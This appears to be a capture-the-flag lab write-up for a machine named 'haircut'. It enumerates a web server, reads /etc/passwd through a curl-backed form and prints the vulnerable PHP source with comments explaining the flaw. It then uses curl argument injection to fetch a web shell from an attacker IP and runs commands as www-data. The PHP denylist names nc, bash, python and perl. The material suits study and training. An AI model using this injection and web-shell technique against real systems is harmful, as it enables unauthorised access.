2 :80
$ gobuster dir -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
===============================================================
/index.html (Status: 200) [Size: 144]
/uploads (Status: 301) [Size: 194] [--> http://10.10.10.24/uploads/]
/test.html (Status: 200) [Size: 223]
/hair.html (Status: 200) [Size: 141]
/exposed.php (Status: 200) [Size: 446]
http://10.10.10.24/exposed.php
Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html
| contains a form that takes a URL, requests it server-side and displays the response
# http://localhost/../../../etc/passwd | http://localhost/../../etc/passwd
404 Not Found
# trying command injection
;ls
<> is not a good thing to put in a URL
# blacklisted chars
;
&
|
{
}
# $ < > are not blacklisted
# submitting an empty value returns curl's usage error, so the backend program is curl
<empty>
Requesting Site...
curl: try 'curl --help' or 'curl --manual' for more information
# trying file:///etc/passwd
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
maria:x:1000:1000:maria,,,:/home/maria:/bin/bash
file:///var/www/html/exposed.php
<span>
<?php
// Handler behind the exposed.php form: takes the posted URL, checks it against a
// substring denylist, and passes it to the curl binary through a shell.
if(isset($_POST['formurl'])){
echo "<p>Requesting Site...</p>";
// Client-controlled value; it is never parsed as a URL or quoted before use.
$userurl=$_POST['formurl'];
$naughtyurl=0;
// Denylist of substrings. It does not contain whitespace, '-', '$', '<' or '>',
// and nothing here restricts the URL scheme, so file:// is accepted as well as
// http://. A denylist like this is incomplete by construction.
$disallowed=array('%','!','|',';','python','nc','perl','bash','&','#','{','}','[',']');
foreach($disallowed as $naughty){
// strpos() is a case-sensitive substring match anywhere in the input.
if(strpos($userurl,$naughty) !==false){
echo $naughty.' is not a good thing to put in a URL';
$naughtyurl=1;
}
}
if($naughtyurl==0){
// Root cause: the value is concatenated unquoted into a shell command line, so
// the shell splits it on whitespace and curl treats the extra tokens as its own
// options (argument injection), on top of the server-side request itself.
// Remediation: replace the denylist with an allowlist. Parse the URL, accept
// only http/https and the intended host(s), then fetch it with PHP's curl
// extension (CURLOPT_PROTOCOLS) instead of a shell. If the binary must be
// used, pass escapeshellarg($userurl) after a "--" end-of-options marker and
// restrict schemes with curl's --proto option.
// NOTE(review): the fetched body is echoed without htmlspecialchars(), so the
// remote content is rendered as markup in this page.
echo shell_exec("curl ".$userurl." 2>&1");
}
}
?>
</span>
# the source shows the input is appended unquoted to the command: curl <URL> 2>&1, so anything after a space is parsed by curl as additional arguments
trying http://10.10.16.7/web.php -o uploads/web.php
# web shell at
http://haircut.htb/uploads/web.php
CMD: whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
haircut
Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux